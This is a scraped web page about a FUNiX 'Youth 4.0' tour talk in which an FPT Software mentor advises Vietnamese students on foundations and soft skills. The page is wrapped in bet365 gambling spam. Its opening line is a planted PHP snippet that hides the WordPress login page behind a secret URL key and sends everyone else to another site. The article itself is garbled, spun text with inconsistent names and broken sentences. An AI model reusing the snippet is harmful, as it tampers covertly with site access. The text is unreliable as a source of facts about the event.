//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Ba yêu cầu cơ bản đối với sinh viên trong thời đại 4.0 | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Ba yêu cầu cơ bản đối với sinh viên trong thời đại 4.0

Khi gặp gỡ sinh viên Đại học Honghu (Đồng Nai) trong khuôn khổ xTour “Tuổi trẻ 4.0”, người phát ngôn nội bộ FPT Software kiêm quản lý dự án Đinh Vũ Quốc Trung cho biết: “Cuộc cách mạng công nghiệp lần thứ hai tạo ra điện vì con người có thể làm việc cả ngày lẫn đêm. Qua đó nâng cao năng suất lao động; trong cuộc cách mạng công nghiệp lần thứ tư, robot sẽ thay thế con người và khiến con người phải làm việc không ngừng nghỉ; ông cũng tin rằng “nhà máy thông minh” sẽ trở thành sản phẩm tiêu biểu trong thời đại công nghệ. – Mentor Dinh Vu China We đang trong thời đại cách mạng công nghiệp 4.0 — Tron cho rằng 4.0 sẽ xóa bỏ ranh giới giữa thế giới thực và thế giới số. Xã hội đang thay đổi nhanh chóng và cơ hội ngày càng lớn Tuy nhiên, thách thức lớn đối với giới trẻ-tương lai như thế nào Đội ngũ lao động luôn cập nhật kiến ​​thức thay vì cạnh tranh với robot để làm việc.

Dựa trên thực tế này, ông Đinh Vũ Quốc Trung đã chia sẻ những thông tin quan trọng mà sinh viên cần lưu ý. Trung Có ý kiến ​​cho rằng, trong thời đại mới kiến ​​thức ai cũng cần không chỉ giới hạn ở môn học, chuyên ngành mình học, sau này các ngành đều liên thông nên muốn tìm được việc làm thì ai cũng phải hiểu biết toàn diện. và phải có nhiều kỹ năng chuyên môn. – Trong thời đại 4.0, ông Trung cho rằng kinh nghiệm không còn là chìa khóa để đạt được sự đổi mới. Tìm việc thành công. Ngoài kinh nghiệm, nhà tuyển dụng còn quan tâm đến thái độ và nghề nghiệp của nhân viên. – “Tâm hồn cởi mở, sự sẵn sàng học hỏi, tiếp thu cái mới và mục tiêu hành động là những yếu tố tạo nên thành công trong tương lai của mỗi người”, chuyên gia nói.

Thầy và trò trường Đại học Honghu (Đồng Nai) at xTour “Thanh niên 4.0” Tương tác với giảng viên FUNiX tại Trung Quốc.

Hiểu nền tảng

Công nghệ được cập nhật liên tục và sẽ phát triển theo thời gian. Mentor Trung cho biết đối với sinh viên năm nhất hoặc năm hai ngành khoa học máy tính, Công nghệ học được có thể bị lạc hậu vào thời điểm ra trường.

Vì vậy, những môn học trọng tâm như kiến ​​thức cơ bản như cấu trúc logic là kiến ​​thức mà học sinh cần học.

“Học sinh thường trở nên khô khan, nặng nề và vô bổ. để học những môn này. Hai năm sau, khi công nghệ đã cũ và không có nền tảng, bạn sẽ không thể tự cập nhật kiến ​​thức của mình. “Giám đốc Dự án Phần mềm FPT.

Phát triển Kỹ năng mềm

Kỹ năng mềm ngày càng trở nên quan trọng đối với mọi người, đặc biệt là trong thời đại công nghệ. Khi gặp gỡ các sinh viên Đại học Lạc Hồng, Mentor Trung chia sẻ 2020 Kể từ khi 10 Ông cho rằng sinh viên Việt Nam cần rèn luyện nhiều kỹ năng tư duy và giải quyết vấn đề. Phê bình (tư duy phản biện), sáng tạo và đàm phán .—— Mười kỹ năng thời đại mới do Diễn đàn Kinh tế Thế giới công bố .— – Cuối buổi giao lưu, Mentor Trung nhắn nhủ các bạn sinh viên: “Đừng ngại hỏi. Đừng sợ bị đánh giá nếu bạn yêu cầu không tốt, đừng yêu cầu điều tốt. Nếu bạn không yêu cầu, bạn không thể làm những gì bạn muốn. Dù là học tập hay công việc thì cần phải có thành công. Chương trình trao đổi mentor FUNiX với sinh viên Đại học Honghu được thực hiện trong xTour “Tuổi trẻ 4.0” do Đại học Trực tuyến FUNiX và trường tổ chức.

Đây là một chuyến đi đến Việt Nam. Chia sẻ tác động của Công nghệ 4.0 và truyền cảm hứng cho giới trẻ hành động. Chương trình bắt đầu tại Cần T từ ngày 12/9, dự kiến ​​kết thúc các hoạt động tập trung vào cuối tháng này, đến nay sẽ kết nối hơn 4.000 sinh viên đại học của 13 tỉnh thành từ nam ra bắc. -Chương

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365